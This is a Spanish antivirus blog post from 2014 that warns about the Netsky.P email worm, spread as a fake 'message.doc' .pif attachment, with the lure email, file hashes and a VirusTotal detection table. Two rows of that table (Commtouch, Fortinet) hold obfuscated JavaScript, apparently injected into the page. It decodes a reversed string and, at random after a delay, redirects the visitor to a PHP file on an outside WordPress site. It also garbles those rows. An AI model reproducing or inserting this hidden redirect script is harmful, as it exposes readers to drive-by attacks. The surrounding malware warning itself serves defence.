Mas intentos de engañar con ingeniería social en el texto de mails con el antiquísimo NETSKY.P
Aunque ya está controlado desde antaño, siempre hay ordenadores que no tienen antivirus o no lo tienen activo, en los que cuela el tan conocido virus NETSKY, el cual se replica a todos los contactos, cambiando el remitente que lo envia:
MAIL MALICIOSO
______________
Asunto: Re: Error in document
De: <falso remitente>
Fecha: 23/06/2014 09:30
Para: <destinatario>
Your important document, correction is finished!
Anexado : message.doc
___________________
FIN DEL MAIL MALICIOSO
El fichero anexado realmente es un PIF (a los que no se les ve la extension) y el usuario ejecuta el malware al intentar visualizar el “documento”
El preanalisis de viristotal ofrece este informe:
MD5 3018e99857f31a59e0777396ae634a8f
SHA1 7031cfe76ee7b2c925f2c00372fb9ef7f983f60c
Tamaño del fichero 28.9 KB ( 29568 bytes )
SHA256: c8fffb2e737514c551b2d7bcaf8baa459564b059cab1a35a3cec4b3c270d4525
Nombre: message.doc.pif
Detecciones: 50 / 54
Fecha de análisis: 2014-06-23 14:18:42 UTC ( hace 1 minuto )
1 22
Análisis
Detalles
Relaciones
Información adicional
Comentarios 10+
Votos
Antivirus Resultado Actualización
AVG I-Worm/Netsky 20140623
Ad-Aware Win32.Generic.497472 20140623
Agnitum I-Worm.NetSky!4NWvXC1SwiU 20140622
AhnLab-V3 Win-Trojan/Fsg.29568 20140623
AntiVir Worm/Netsky.AP 20140623
Avast Win32:Netsky-AF [Wrm] 20140623
Baidu-International Worm.Win32.NetSky.az 20140623
BitDefender Win32.Generic.497472 20140623
Bkav W32.SkyNetP.Worm 20140623
CAT-QuickHeal W32.NetSky.P 20140621
CMC Generic.Win32.3018e99857!MD 20140622
ClamAV Worm.NetSky-14 20140622
Commtouch $NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to:W32/Netsky.P@mm”>W32/Netsky.P@mm 20140623
F-Secure Win32.Generic.497472 20140623
Fortinet $NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to:W32/Netsky.p@MM”>W32/Netsky.p@MM 20140623
McAfee-GW-Edition Heuristic.BehavesLike.Win32.Suspicious-PKR.G 20140622
MicroWorld-eScan Win32.Generic.497472 20140623
Microsoft Worm:Win32/Netsky.P@mm 20140623
NANO-Antivirus Trojan.Win32.NetSky.idzx 20140623
Norman Netsky.P 20140623
Panda W32/Netsky.AE.worm 20140623
Qihoo-360 Win32/Worm.d2e 20140623
Rising PE:Trojan.Win32.Generic.129CEE65!312274533 20140623
SUPERAntiSpyware Worm.Netsky-P 20140623
Sophos W32/Netsky-P 20140623
Symantec todavía no lo controlan …
El ELINETSA.EXE existente en nuestra web, detecta y elimina dicha variante.
saludos
ms, 23-6-2014
NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________
Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.
Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.
Los comentarios están cerrados.